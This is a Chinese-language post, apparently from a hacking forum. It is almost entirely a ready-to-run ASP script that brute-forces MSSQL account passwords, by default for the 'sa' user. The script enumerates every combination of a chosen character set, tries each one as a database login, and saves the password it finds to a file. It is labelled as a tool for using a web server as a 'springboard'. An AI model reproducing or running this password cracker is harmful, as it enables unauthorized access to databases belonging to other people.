一個(gè)暴力破解MSSQL用戶密碼的ASP程序，最早發(fā)布在EST論壇。以下這個(gè)版本是可以運(yùn)行之后關(guān)閉瀏覽器，運(yùn)行完畢將在當(dāng)前目錄生成結(jié)果文件的。用ASP做事情效率很慢，當(dāng)然這個(gè)程序所體現(xiàn)的不是它的效率，而是……給你點(diǎn)懸念，不然多沒(méi)意思哦。

自己把以下代碼保存為ASP文件。當(dāng)然我還是一如既往的BS那些只改作者名字的家伙。

復(fù)制代碼代碼如下:

<%  
'============ ASP Port Scanner by lake2 ===================  
'http://lake2.0x54.org  
'Version: 0.1  
'For SpringBoard  
'==========================================================  
%>  
<style type="text/css">  
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}  
body {background-color: #ffffff;font-size:14px; }  
a:link {color: #0000FF;text-decoration: none;}  
a:visited {text-decoration: none;color: #0000FF;}  
a:hover {text-decoration: none;color: #FF0000;}  
a:active {text-decoration: none;color: #FF0000;}  
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}  
.TextBox {border: 1px solid #084B8E}  
.styleRed {color: #FF0000}  
</style>  
<title>MSSQL Cracker for SpringBoard</title>  
<%  
Dim Password()  
If Request.Form("go") <> "1" Then  
%>  
 <div align="center">Welcome to <a >http://lake2.0x54.org</a> </div>  
 <form name="form1" method="post" action="" onSubmit="form1.Submit.disabled=true;">  
  ConnStr:   
  <input name="conn" type="text" class="TextBox" id="conn" value="Provider=SQLOLEDB.1;Data Source=127.0.0.1;User ID=sa;Password={PASS};" size="70">  
  <br>  
  Char: &nbsp;&nbsp;&nbsp;&nbsp;  
  <input name="char" type="text" class="TextBox" id="char" value="0123456789" size="30">  
&nbsp;&nbsp;&nbsp;<br>  
Length:&nbsp;&nbsp;  
<input name="len" type="text" class="TextBox" id="len" value="3" size="4">  
<br>   
Path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  
<input name="path" type="text" class="TextBox" value="<%=Server.MapPath("r.txt")%>" size="50">  
<input name="CFile" type="checkbox" class="TextBox" id="CFile" value="1" checked>  
Enablel<br>  
<input name="go" type="hidden" id="go" value="1">  
<br>  
<input name="Submit" type="submit" class="buttom" id="Submit" value=" Run ">  
</form>  
<%  
Else  
 timer1 = timer  
 Server.ScriptTimeout = 7776000  
 ConnStr = Request.Form("Conn")  
 Char = request.Form("char")  
 LenChar = Len(Char)  
 ReDim password(LenChar)  
 For i = 1 to LenChar  
  password(i) = Mid(Char, i, 1)  
 Next  
 length = CInt(request.Form("len"))  
 Call LAKE("")  
 response.Write "Done!<br>Process " & tTime & " s"  
 If request.Form("CFile") <> "" Then CreateResult("Done!" & vbcrlf & tTime)  
End If  

Sub LAKE(str)  
 If Len(str) >= length Then Exit Sub  
 For j = 1 to LenChar  
  pass = str & password(j)  
  If Len(pass) = length Then Call Crack(pass)  
  Call LAKE(pass)  
 Next  
End Sub  

Sub Crack(str)  
 On Error Resume Next  
 Set conn = Server.CreateObject("ADODB.connection")  
 conn.open Replace(ConnStr,"{PASS}",str)  
 If Err Then  
  If Err.Number <> -2147217843 Then  
   response.Write(Err.Description & "<BR>")  
   response.End()  
  End If  
 Else  
  response.Write("I Get it ! Password is <font color=red>" & str & "</font><BR>Process " & tTime & " s")  
  If request.Form("CFile") <> "" Then CreateResult(str & vbcrlf & tTime)  
  response.End()  
 End If  
End Sub  

Function tTime()  
 timer2 = timer  
 thetime=cstr(int(timer2-timer1))  
 tTime = thetime  
End Function  

Sub CreateResult(t)  
 Set fs = CreateObject("Scripting.FileSystemObject")   
 Set outfile = fs.CreateTextFile(request.Form("path"))  
 outfile.WriteLine t  
 Set fs = Nothing  
End Sub  
%> 